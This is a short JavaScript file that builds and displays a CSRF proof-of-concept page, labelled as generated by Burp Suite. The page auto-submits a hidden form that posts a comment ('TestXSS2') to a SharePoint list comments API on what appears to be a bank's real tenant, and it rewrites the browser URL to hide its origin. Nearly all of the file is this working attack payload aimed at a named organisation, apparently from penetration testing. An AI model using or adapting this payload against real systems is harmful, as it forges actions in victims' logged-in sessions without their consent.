
const js_thml = () => {
	let code = "";
	code += "<html>\n";
	code += "  <!-- CSRF PoC - generated by Burp Suite Professional -->\n";
	code += "  <body>\n";
	code += "\t<form action=\"https://sacombankvn.sharepoint.com/sites/QunldnGBM/_api/web/lists(@a1)/GetItemById(@a2)/Comments()?@a1=%27%7B63c44e7f%2Dc900%2D437a%2Dbd07%2Da4ff273afc14%7D%27&@a2=%271%27\" method=\"POST\" enctype=\"text/plain\">\n";
	code += "\t  <input type=\"hidden\" name=\"&#123;&quot;text&quot;&#58;&quot;TestXSS2&quot;&#44;&quot;mentions&quot;&#58;&#91;&#93;&#125;\" value=\"\" />\n";
	code += "\t  <input type=\"submit\" value=\"Submit request\" />\n";
	code += "\t</form>\n";
	code += "\t<script>\n";
	code += "\t  history.pushState('', '', '/');\n";
	code += "\t  document.forms[0].submit();\n";
	code += "\t<\\/script>\n";
	code += "  </body>\n";
	code += "</html>\n";
	code += "\n";
	return code;
}


document.getElementById("js_html").innerText = js_thml();
document.getElementById("html-text").value = js_thml();
